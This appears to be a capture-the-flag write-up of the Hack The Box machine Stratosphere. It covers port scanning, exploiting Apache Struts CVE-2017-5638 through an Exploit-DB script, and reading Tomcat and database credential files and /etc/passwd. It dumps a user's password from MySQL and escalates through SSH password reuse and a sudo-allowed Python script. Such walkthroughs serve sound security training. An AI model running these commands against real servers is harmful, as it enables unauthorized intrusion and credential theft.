Stratosphere
Contents
Port scan
u505@naos:~/HTB/Machines/Stratosphere$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.64
Starting masscan 1.0.5 at 2021-01-21 09:39:24 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 8080/tcp on 10.10.10.64 Discovered open port 22/tcp on 10.10.10.64 Discovered open port 80/tcp on 10.10.10.64
u505@naos:~/HTB/Machines/Stratosphere$ nmap -sC -sV stratosphere Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-21 04:39 EST Nmap scan report for stratosphere (10.10.10.64) Host is up (0.037s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0) | ssh-hostkey: | 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA) | 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA) |_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519) 80/tcp open http | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 1114 | Date: Thu, 21 Jan 2021 09:48:18 GMT | Connection: close | <!doctype html><html lang="en"><head><title>HTTP Status 404 | Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body> | GetRequest: | HTTP/1.1 200 | Accept-Ranges: bytes | ETag: W/"1708-1519762495000" | Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT | Content-Type: text/html | Content-Length: 1708 | Date: Thu, 21 Jan 2021 09:48:18 GMT | Connection: close | <!DOCTYPE html> | <html> | <head> | <meta charset="utf-8"/> | <title>Stratosphere</title> | <link rel="stylesheet" type="text/css" href="main.css"> | </head> | <body> | <div id="background"></div> | <header id="main-header" class="hidden"> | <div class="container"> | <div class="content-wrap"> | <p><i class="fa fa-diamond"></i></p> | <nav> | class="btn" href="GettingStarted.html">Get started</a> | </nav> | </div> | </div> | </header> | <section id="greeting"> | <div class="container"> | <div class="content-wrap"> | <h1>Stratosphere<br>We protect your credit.</h1> | class="btn" href="GettingStarted.html">Get started now</a> | <p><i class="ar | HTTPOptions: | HTTP/1.1 200 | Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS | Content-Length: 0 | Date: Thu, 21 Jan 2021 09:48:18 GMT | Connection: close | RTSPRequest, X11Probe: | HTTP/1.1 400 | Date: Thu, 21 Jan 2021 09:48:18 GMT |_ Connection: close | http-methods: |_ Potentially risky methods: PUT DELETE |_http-title: Stratosphere 8080/tcp open http-proxy | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 | Content-Type: text/html;charset=utf-8 | Content-Language: en | Content-Length: 1114 | Date: Thu, 21 Jan 2021 09:48:18 GMT | Connection: close | <!doctype html><html lang="en"><head><title>HTTP Status 404 | Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body> | GetRequest: | HTTP/1.1 200 | Accept-Ranges: bytes | ETag: W/"1708-1519762495000" | Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT | Content-Type: text/html | Content-Length: 1708 | Date: Thu, 21 Jan 2021 09:48:18 GMT | Connection: close | <!DOCTYPE html> | <html> | <head> | <meta charset="utf-8"/> | <title>Stratosphere</title> | <link rel="stylesheet" type="text/css" href="main.css"> | </head> | <body> | <div id="background"></div> | <header id="main-header" class="hidden"> | <div class="container"> | <div class="content-wrap"> | <p><i class="fa fa-diamond"></i></p> | <nav> | class="btn" href="GettingStarted.html">Get started</a> | </nav> | </div> | </div> | </header> | <section id="greeting"> | <div class="container"> | <div class="content-wrap"> | <h1>Stratosphere<br>We protect your credit.</h1> | class="btn" href="GettingStarted.html">Get started now</a> | <p><i class="ar | HTTPOptions: | HTTP/1.1 200 | Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS | Content-Length: 0 | Date: Thu, 21 Jan 2021 09:48:18 GMT | Connection: close | RTSPRequest: | HTTP/1.1 400 | Date: Thu, 21 Jan 2021 09:48:18 GMT |_ Connection: close | http-methods: |_ Potentially risky methods: PUT DELETE |_http-title: Stratosphere 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.91%I=7%D=1/21%Time=60094BE3%P=x86_64-pc-linux-gnu%r(GetR SF:equest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\x2 SF:0W/\"1708-1519762495000\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x20201 SF:8\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x SF:201708\r\nDate:\x20Thu,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nConn SF:ection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x2 SF:0\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratosphere< SF:/title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/css SF:\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background\" SF:></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20<d SF:iv\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-wra SF:p\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i>< SF:/p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<a\ SF:x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\n\ SF:x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>\n SF:</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"cont SF:ainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x20 SF:\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1>\ SF:n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted\. SF:html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20clas SF:s=\"ar")%r(HTTPOptions,8A,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HE SF:AD,\x20POST,\x20PUT,\x20DELETE,\x20OPTIONS\r\nContent-Length:\x200\r\nD SF:ate:\x20Thu,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nConnection:\x20 SF:close\r\n\r\n")%r(RTSPRequest,49,"HTTP/1\.1\x20400\x20\r\nDate:\x20Thu, SF:\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nConnection:\x20close\r\n\r\ SF:n")%r(X11Probe,49,"HTTP/1\.1\x20400\x20\r\nDate:\x20Thu,\x2021\x20Jan\x SF:202021\x2009:48:18\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(FourOhFou SF:rRequest,4F6,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html;charse SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x201114\r\nDate:\ SF:x20Thu,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nConnection:\x20close SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta SF:tus\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=\"text SF:/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgroun SF:d-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,san SF:s-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20 SF:{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D SF:76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;col SF:or:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,san SF:s-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:Tah SF:oma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x20a SF:\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1p SF:x;background-color:#525D76;border:none;}</style></head><body>"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8080-TCP:V=7.91%I=7%D=1/21%Time=60094BE3%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\ SF:x20W/\"1708-1519762495000\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x202 SF:018\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length: SF:\x201708\r\nDate:\x20Thu,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nCo SF:nnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\ SF:x20\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratospher SF:e</title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/c SF:ss\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background SF:\"></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20 SF:<div\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-w SF:rap\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i SF:></p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20< SF:a\x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\ SF:n\x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div> SF:\n</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"co SF:ntainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x SF:20\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1 SF:>\n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted SF:\.html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20cl SF:ass=\"ar")%r(HTTPOptions,8A,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20 SF:HEAD,\x20POST,\x20PUT,\x20DELETE,\x20OPTIONS\r\nContent-Length:\x200\r\ SF:nDate:\x20Thu,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nConnection:\x SF:20close\r\n\r\n")%r(RTSPRequest,49,"HTTP/1\.1\x20400\x20\r\nDate:\x20Th SF:u,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nConnection:\x20close\r\n\ SF:r\n")%r(FourOhFourRequest,4F6,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x2 SF:0text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\ SF:x201114\r\nDate:\x20Thu,\x2021\x20Jan\x202021\x2009:48:18\x20GMT\r\nCon SF:nection:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head>< SF:title>HTTP\x20Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><sty SF:le\x20type=\"text/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;colo SF:r:white;background-color:#525D76;font-size:22px;}\x20h2\x20{font-family SF::Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size SF::16px;}\x20h3\x20{font-family:Tahoma,Arial,sans-serif;color:white;backg SF:round-color:#525D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Ari SF:al,sans-serif;color:black;background-color:white;}\x20b\x20{font-family SF::Tahoma,Arial,sans-serif;color:white;background-color:#525D76;}\x20p\x2 SF:0{font-family:Tahoma,Arial,sans-serif;background:white;color:black;font SF:-size:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.l SF:ine\x20{height:1px;background-color:#525D76;border:none;}</style></head SF:><body>"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.12 seconds
SSH
The ssh service is accessible and allows password access.
u505@naos:~/HTB/Machines/Stratosphere$ ssh u505@stratosphere The authenticity of host 'stratosphere (10.10.10.64)' can't be established. ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'stratosphere,10.10.10.64' (ECDSA) to the list of known hosts. u505@stratosphere's password: Permission denied, please try again. u505@stratosphere's password: Permission denied, please try again. u505@stratosphere's password: u505@stratosphere: Permission denied (publickey,password).
Web enumeration
stratosphere.htb
u505@naos:~/HTB/Machines/Stratosphere$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,jsp" -f -t 100 -u http://stratosphere
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: txt, html, jsp | HTTP method: GET | Threads: 100 | Wordlist size: 1102600
Error Log: /opt/utils/dirsearch/logs/errors-21-01-21_04-52-33.log
Target: http://stratosphere/
Output File: /opt/utils/dirsearch/reports/stratosphere/_21-01-21_04-52-33.txt
[04:52:33] Starting:
[04:52:33] 200 - 2KB - /index.html
[04:53:35] 302 - 0B - /manager/ -> /manager/html
[04:53:35] 302 - 0B - /manager -> /manager/
[04:54:26] 200 - 203B - /GettingStarted.html
[04:55:12] 302 - 0B - /Monitoring -> /Monitoring/
[04:55:12] 200 - 199B - /Monitoring/
[04:57:06] 400 - 0B - /http%3A%2F%2Fwww.txt
[04:57:06] 400 - 0B - /http%3A%2F%2Fwww.html
...
An unknown page banners the Tomcat 8.5.14.
stratosphere.htb/Monitoring/
The monitoring application seems to be a under construction structs application.
Struts vulnerability
After a while enumerating. In CVE page https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-6117/Apache-Struts.html the CVE-2017-5683 has a score of 10 and the dates matches the machine release date.
u505@naos:~/HTB/Machines/Stratosphere$ searchsploit struts
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit) | multiple/remote/24874.rb
Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/33142.rb
Apache Struts - Developer Mode OGNL Execution (Metasploit) | java/remote/31434.rb
Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit) | linux/remote/39756.rb
Apache Struts - includeParams Remote Code Execution (Metasploit) | multiple/remote/25980.rb
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities | multiple/webapps/18452.txt
Apache Struts - OGNL Expression Injection | multiple/remote/38549.txt
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/39919.rb
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Executio | multiple/remote/43382.py
Apache Struts 1.2.7 - Error Response Cross-Site Scripting | multiple/remote/26542.txt
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution | java/webapps/48917.py
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit) | multiple/remote/27135.rb
Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) | multiple/remote/45367.rb
Apache Struts 2 - Skill Name Remote Code Execution | multiple/remote/37647.txt
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit) | multiple/remote/44643.rb
Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities | multiple/webapps/18329.txt
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload | java/webapps/37009.xml
Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting | multiple/remote/35735.txt
Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution | multiple/remote/44556.py
Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass | multiple/remote/36426.txt
Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit) | multiple/remote/18984.rb
Apache Struts 2.2.3 - Multiple Open Redirections | multiple/remote/38666.txt
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) | linux/remote/45260.py
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) | multiple/remote/45262.py
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL I | multiple/remote/41614.rb
Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution | linux/webapps/41570.py
Apache Struts 2.3.x Showcase - Remote Code Execution | multiple/webapps/42324.py
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | linux/remote/42627.py
Apache Struts 2.5.20 - Double OGNL evaluation | multiple/remote/49068.py
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Exec | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection | multiple/webapps/44583.txt
Struts 2.0.11 - Multiple Directory Traversal Vulnerabilities | multiple/remote/32565.txt
Struts2/XWork < 2.2.0 - Remote Command Execution | multiple/remote/14360.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Stratosphere$ searchsploit -m 41570
Exploit: Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/41570
Path: /usr/share/exploitdb/exploits/linux/webapps/41570.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Stratosphere/41570.py
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py
[*] struts2_S2-045.py <url> <cmd>
We have code execution.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action whoami [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: whoami
tomcat8
Local enumeration
I tried to obtain a shell, but the shell did not open.
u505@naos:~/HTB/Machines/Stratosphere$ sudo tcpdump -i tun0 icmp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
We launch a ping from the target.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "ping -c 2 10.10.14.9" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: ping -c 2 10.10.14.9
PING 10.10.14.9 (10.10.14.9) 56(84) bytes of data.
--- 10.10.14.9 ping statistics --- 2 packets transmitted, 0 received, 100% packet loss, time 1017ms
But we received the ping request and the response was sent back.
u505@naos:~/HTB/Machines/Stratosphere$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
05:55:10.242187 IP stratosphere > 10.10.14.9: ICMP echo request, id 1316, seq 1, length 64
05:55:10.242228 IP 10.10.14.9 > stratosphere: ICMP echo reply, id 1316, seq 1, length 64
05:55:11.260345 IP stratosphere > 10.10.14.9: ICMP echo request, id 1316, seq 2, length 64
05:55:11.260385 IP 10.10.14.9 > stratosphere: ICMP echo reply, id 1316, seq 2, length 64
The machine is firewalled and doesn't allow incoming connection on any port but 22, 80 and 8080.
Failed access to tomcat manager
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "cat /etc/tomcat8/tomcat-users.xml" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: cat /etc/tomcat8/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?> <tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <user username="teampwner" password="cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$" roles="manager-gui,admin-gui" /> </tomcat-users>
I tried the user and password, but strangely no access was granted.
Database access
In the root file of the tomcat profile the file db_connect provides database credentials.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "ls -l" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: ls -l
total 16 lrwxrwxrwx 1 root root 12 Sep 3 2017 conf -> /etc/tomcat8 -rw-r--r-- 1 root root 68 Oct 2 2017 db_connect drwxr-xr-x 2 tomcat8 tomcat8 4096 Sep 3 2017 lib lrwxrwxrwx 1 root root 17 Sep 3 2017 logs -> ../../log/tomcat8 drwxr-xr-x 2 root root 4096 Jan 21 04:40 policy drwxrwxr-x 4 tomcat8 tomcat8 4096 Feb 10 2018 webapps lrwxrwxrwx 1 root root 19 Sep 3 2017 work -> ../../cache/tomcat8 u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "cat db_connect" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: cat db_connect
[ssn] user=ssn_admin pass=AWs64@on*&
[users] user=admin pass=admin
The command netstat is missing on the machine.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "netstat -ltun" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: netstat -ltun
/bin/bash: netstat: command not found
Reading /proc we can see the listening ports on the machine.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "cat /proc/net/tcp" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: cat /proc/net/tcp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 13199 1 ffff9153b93787c0 100 0 0 10 0 1: 0100007F:1F45 00000000:0000 0A 00000000:00000000 00:00000000 00000000 115 0 16103 1 ffff9153bb30f800 100 0 0 10 0 2: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000 116 0 15030 1 ffff9153b9378040 100 0 0 10 0 3: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000 115 0 15181 1 ffff9153bb30f080 100 0 0 10 0 4: 400A0A0A:1F90 090E0A0A:C0BC 01 00000000:00000000 00:00000000 00000000 115 0 48016 1 ffff9153b93917c0 23 4 28 10 14 5: 400A0A0A:1F90 090E0A0A:C0BA 06 00000000:00000000 03:0000131E 00000000 0 0 0 3 ffff9153bb32f690
u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 16"|bc 22 u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 1F45"|bc 8005 u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 0CEA"|bc 3306 u505@naos:~/HTB/Machines/Stratosphere$ echo "ibase=16; 1F90"|bc 8080
The port 3306 is listening, we can assume the database is MySQL. We list the databases.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "echo show databases | mysql -u admin -padmin" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: echo show databases | mysql -u admin -padmin
Database information_schema users
List the tables.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action "echo show tables | mysql -u admin -padmin users" [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: echo show tables | mysql -u admin -padmin users
Tables_in_users accounts
Describe the table accounts.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action 'echo desc accounts | mysql -u admin -padmin users' [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: echo desc accounts | mysql -u admin -padmin users
Field Type Null Key Default Extra fullName varchar(45) YES NULL password varchar(30) YES NULL username varchar(20) YES NULL
Query the table.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action 'echo select fullName,password,username from accounts | mysql -u admin -padmin users' [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: echo select fullName,password,username from accounts | mysql -u admin -padmin users
fullName password username Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
We found a user and password.
User flag
The user richard is a system user.
u505@naos:~/HTB/Machines/Stratosphere$ python 41570.py http://stratosphere.htb/Monitoring/example/Welcome.action 'cat /etc/passwd' [*] CVE: 2017-5638 - Apache Struts2 S2-045 [*] cmd: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ... saned:x:114:118::/var/lib/saned:/bin/false richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash tomcat8:x:115:119::/var/lib/tomcat8:/bin/bash mysql:x:116:120:MySQL Server,,,:/nonexistent:/bin/false
The password is reused on the system, and ssh is allowed.
u505@naos:~/HTB/Machines/Stratosphere$ ssh richard@stratosphere richard@stratosphere's password: Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2 richard@stratosphere:~$ whoami richard
richard@stratosphere:~$ cat user.txt <USER_FLAG>
Privileges escalation
richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
Richard is allowed to execute the file test.py as root.
Challenge script
test.py script seems to be an hash decryption challenge, and at the end it executes the script /root/success.py as root.
richard@stratosphere:~$ cat test.py #!/usr/bin/python3 import hashlib
def question(): q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n") md5 = hashlib.md5() md5.update(q1.encode()) if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb": print("Sorry, that's not right") return print("You got it!") q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n") sha1 = hashlib.sha1() sha1.update(q2.encode()) if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff': print("Nope, that one didn't work...") return print("WOW, you're really good at this!") q3 = input("How about this? 91ae5fc9ecbca9d346225063f23d2bd9\n") md4 = hashlib.new('md4') md4.update(q3.encode()) if not md4.hexdigest() == '91ae5fc9ecbca9d346225063f23d2bd9': print("Yeah, I don't think that's right.") return print("OK, OK! I get it. You know how to crack hashes...") q4 = input("Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943\n") blake = hashlib.new('BLAKE2b512') blake.update(q4.encode()) if not blake.hexdigest() == '9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943': print("You were so close! urg... sorry rules are rules.") return
import os os.system('/root/success.py') return
question()
Hash cracks
